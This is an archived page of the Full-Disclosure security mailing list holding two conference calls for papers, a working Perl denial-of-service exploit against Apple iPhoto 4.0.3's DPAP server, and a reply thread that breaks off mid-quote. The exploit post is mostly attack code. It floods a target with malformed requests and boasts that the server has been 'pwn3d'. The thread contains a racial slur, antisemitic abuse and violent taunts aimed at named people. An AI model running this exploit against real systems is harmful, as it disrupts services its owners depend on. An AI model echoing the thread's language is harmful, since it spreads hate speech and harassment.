[Full-disclosure] Call for Papers: First IEEE International Workitorial on Steganography - "Vision of the Unseen"

2008-02-18 Thread wjs3 

We are pleased to announce the First IEEE Workitorial on Vision of the
Unseen (WVU'08). http://www.liv.ic.unicamp.br/wvu/

This unique event will engage the Vision and Security Communities in this
challenging area. WVU'08 is a combined tutorial and a workshop exploring the 
many facets of vision and pattern recognition to 'see' what humans cannot. It 
will be held in conjunction with CVPR in Anchorage, Alaska on June 23rd, 2008.

We invite you to submit results on one of the 2 classes of papers: regular
and competition. Regular papers comprises brand new and unpublished results on 
one or more of the following topics:

- Steganography and Steganalysis

- Forgery/manipulation detection

- Sensor fingerprinting

- Image authentication

- Information Hiding

- Algorithm fusion for the above topics

Competition papers comprises papers for the Unseen Challenge. Such papers
must explore the performance of previously published or new Steganalysis
algorithms on a challenge dataset (which we will provide).

All papers must follow the IEEE format style and have up to 6 pages, with
the option of purchasing up to 2 extra pages for $100 per page.

Finally, WVU'08 will present a Tutorial Session with the most recent
developments on the Vision of the Unseen.

Important Dates:

Regular papers
  + Submission: 3/20/08
  + Acceptance: 4/15/08
  + Camera Ready: 5/1/08

Competition papers
  + Submission: 4/10/08
  + Acceptance: 4/25/08
  + Camera Ready: 5/1/08



-Walter


--
Walter J. Scheirer
Graduate Student
Department of Computer Science
University of Colorado at Colorado Springs

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Apple iPhoto v4.0.3 DPAP Server Denial of Service Exploit

2008-02-18 Thread David Wharton 
A little zero-day exploit in memory of Dude VanWinkle.

Apple iPhoto v4.0.3 DPAP (Digital Photo Access Protocol) Server Denial  
of Service Exploit.

Other versions may be vulnerable too; the current version should not  
be vulnerable.

The server process catches the exception, exits cleanly, but does not  
restart.

This exploits a previously undisclosed vulnerability.

-David Wharton

---

#!/usr/bin/perl
# crash the iPhoto DPAP (Digital Photo Access Protocol) Server on  
iPhoto 4.0.3
# technically the server exits cleanly but it does not restart

use IO::Socket::INET;

die "Usage $0 \n" unless ($ARGV[0]);

$| = 1;

if ($ARGV[1]) {
 $port = $ARGV[1];
} else {
 $port = 8770;
}

$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[0],
   PeerPort=>$port,
   Proto=>'tcp');

if ($socket == NULL) {
die "Cannot connect to $ARGV[0] on port $port\n";
}


$malformed_data = "AAA";
#$malformed_data = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n";
$count = 0;

$msg="GET dpap://$malformed_data HTTP/1.1\r\n\r\n";
print "Sending message:\n$msg\n";
$socket->send($msg);
$socket->close();
sleep(1);
$cont = 1;

# this loop is unnecessary but who cares
while ($cont && $count < 11) {
 $socket2 = new IO::Socket::INET->new(PeerAddr=>$ARGV[0],  
PeerPort=>$port, Proto=>'tcp');
 if ($socket2 == NULL) {
 $cont = 0;
 print "crash\n";
 } else {
 print ".";
# next line not necessary but does the job too
$malformed_data = $malformed_data.$malformed_data;
 $msg="GET dpap://$malformed_data HTTP/1.1\r\n\r\n";
 $socket2->send($msg);
 $count++;
 $socket2->close();
 sleep(1);
 }
}

if ($count < 10) {
 print "iPhotoDPAPServer on $ARGV[0] has been pwn3d\n";
} else {
 print "Unable to crash iPhotoDPAPServer on $ARGV[0]\n";
}

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] RUXCON 2008 CALL FOR PAPERS

2008-02-18 Thread cfp 
RUXCON 2008 CALL FOR PAPERS

RuxCon would like to announce the call for papers for the fifth annual
RuxCon conference.

This year the conference will commence during the 29th/30th November.

As with previous years, RuxCon will be held at the University of
Technology, Sydney, Australia.

The deadline for submissions is the 31st of October.

* What is RuxCon?

  RuxCon strives to be Australia's most technical and interesting
  computer security conference. We're back for the fifth year
  and intend on bringing you another high quality conference.

  The conference is held over two days in a relaxed atmosphere,
  allowing attendees to enjoy themselves whilst expanding their
  knowledge of security.

  Live presentations and activities will cover a full range of
  defensive and offensive security topics, varying from unpublished
  research to required reading for the public security community.

  For more information, please visit http://www.ruxcon.org.au

* Presentation Information

  Presentations are set to run for 50 minutes, and will be of a formal
  nature, with slides and a speech.

* Presentation Submissions

  RuxCon would like to invite people who are interested in security to
  submit a presentation.

  Topics of interest include, but are not limited to:

o Code analysis
o Exploitation techniques
o Network scanning and analysis
o Cryptography
o Malware Analysis
o Reverse engineering
o Forensics and Anti-forensics
o Social engineering
o Web application security
o Database security
o Legal aspects of computer security and surrounding issues
o Law enforcement activities
o Telecommunications security (mobile, GSM, VOIP, etc)

  Submissions should thoroughly outline your desired presentation or
  workshop subject. Accompanying your submission should be the slides
  you intend to use or a detailed paper explaining your subject.

  If you have any enquiries about submissions, or would like to make a
  submission, please send an e-mail to presentations @ ruxcon dot org
  dot au

  The deadline for submissions is the 31st of October.

  If approved we will additionally require:

i.  A brief personal biography (between 2-5 paragraphs in
length), including: skill set, experience, and credentials.

ii. A description on your presentation or workshop (between 2-5
paragraphs in length).

* Contact Details

Presentation Submissions:  presentations @ ruxcon dot org dot au
General Enquiries: staff @ ruxcon dot org dot au

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] let's name something after dude vanwinkle

2008-02-18 Thread Darkie Duck 
Hmm they both niggers?

> Date: Sat, 16 Feb 2008 12:01:49 -0500> To: full-disclosure@lists.grok.org.uk; 
> [EMAIL PROTECTED]> From: [EMAIL PROTECTED]> Subject: Re: [Full-disclosure] 
> let's name something after dude vanwinkle> > Dear Andjew,> > 
> c35312fb3a7e05b7a44db2326bd29040> > This hash is proof that Gobbles and 
> n3td3v are one in the same. I > will reveal this information as soon it is 
> cleared for publication > by Dr. Neal Krawetz, with whom I have been 
> collaborating with for > some time now.> > As for your Anti-Semetic remarks, 
> they are not appreciated. Please > take your hatred for the Jews and other 
> sub-human cultures off list.> > J> > "The best political weapon is the weapon 
> of terror. Cruelty > commands respect. Men may hate us. But, we don't ask for 
> their > love; only for their fear." - Paul Schmehl> > _> > > _> > On Sat, 16 
> Feb 2008 10:33:15 -0500 Andrew A <[EMAIL PROTECTED]> > wrote:> >dear 
> mengele,> >> >n3td3v isn't gobbles. rocky is pretty sharp and hilarious. 
> n3td3v > >is only> >unintentionally funny.> >> >also why haven't you injected 
> bleach into the eyes of known > >talmudic piglet> >gadi evron?> >> >On Feb 
> 15, 2008 3:48 PM, Joey Mengele <[EMAIL PROTECTED]> > >wrote:> >> >> Dear 
> Gobbles,> >>> >> We can rename him 'Dude Van Bitchwrinkle'. Get it? That 
> means > >pussy> >> in American. LOLOLOL.> >>> >> J> >>> >> "I told you I was 
> hardcore" - Dude Van Bitchwrinkle> >>> >> On Fri, 15 Feb 2008 12:43:16 -0500 
> worried security> >> <[EMAIL PROTECTED]> wrote:> >> >i've been thinking about 
> this for a few days and i think > >something> >> >should be named after him 
> or a foundation or charity setup in > >his> >> >name.> >> >> >> >even a new 
> mailing list named after him or some good cause to > >come> >> >from his life 
> to keep his alias in circulation for future> >> >generations> >> >of security 
> folks to learn about him.> >> >> >> >i'm very disappointed he wasn't 
> mentioned on securityfocus but> >> >those> >> >folks are on the same downhill 
> spiral as yahoo inc anyway, so > >why> >> >should we care what securityfocus 
> are doing.> >> >> >> >its time to get brain storming on this, but i want him 
> to stay > >in> >> >memory long after we're gone..> >> >> >> >me and dude 
> vanwinkle weren't best o friends or best o enemies > >but> >> >i> >> >did 
> read his posts everyday and thought he was ok.> >> >> >> >i will leave it 
> upto the funsec crowd and gadi evron to > >organise> >> >and> >> >decide if 
> something and what should be named after him, i don't> >> >want> >> >to be 
> part of organising, i'm just throwing the suggestion out> >> >there> >> >for 
> the real decision makers to decide what the next step > >should> >> >be in> 
> >> >remembering the dude.> >> >> >> >i have a mailing list called n3td3v so 
> if i get killed there is> >> >something for me on the internet to keep my 
> name in > >circulation,> >> >its> >> >time there was something to remember 
> dude vanwinkle.> >> >> >> >i'll leave it upto the higher ups to decide if 
> this is a good > >or> >> >bad> >> >suggestion its not upto me to decide on 
> things like this.> >> >> >> >gadi evron is a born leader, so i give it to him 
> to lead this > >and> >> >decide on what should be setup or named after him.> 
> >> >> >> >and if nothing is setup and named after him, then i will do it> >> 
> >myself,> >> >because i think something should.> >> >> >> >so folks, get 
> brain storming and we can come up with the best> >> >tribute> >> >for to 
> remember the vanwinkle by.> >> >> >> >we don't want to name a worm after him 
> or anything like that,> >> >let's> >> >keep it lawful and whitehat lolz.> >> 
> >> >> >i will be montioring the conversation closely and if i think> >> 
> >something> >> >is wrong with what you are doing i will step in and make my > 
> >views> >> >clear on matters. but i think gadi evron is competent enough to> 
> >> >come> >> >up with a fitting tribute to name him after without me putting 
> > >my> >> >weight in. my weight however will always be available to step > 
> >in> >> >if i> >> >don't agree with whats going on. lolz.> >> >> >> >i don't 
> like gadi evron,however, he is the biggest person after > >me> >> >on> >> 
> >the mailing lists, so i elect him to do it. i am big in the> >> >security> 
> >> >community, bigger than evron, but i want him to do it cos i> >> 
> >decided.lolz.> >> >> >> >hackerz+security experts unite...to create 
> something for the > >dude.> >> >> >> 
> >___> >> >Full-Disclosure - We 
> believe in it.> >> >Charter: 
> http://lists.grok.org.uk/full-disclosure-charter.html> >>> >> --> >> Click to 
> begin your health care training online. Request info > >today.> >>> >> > 
> >http://tagline.hushmail.com/fc/Ioyw6h4fOHX3UcHC81m6VjoI7vOADgxa6xLs> 
> >uEkRfPg3qImz4GvWkg/> >> >Hosted and sponsored by Secunia - 
> http://secunia.com/> >>> >> ___> 
> >> Full-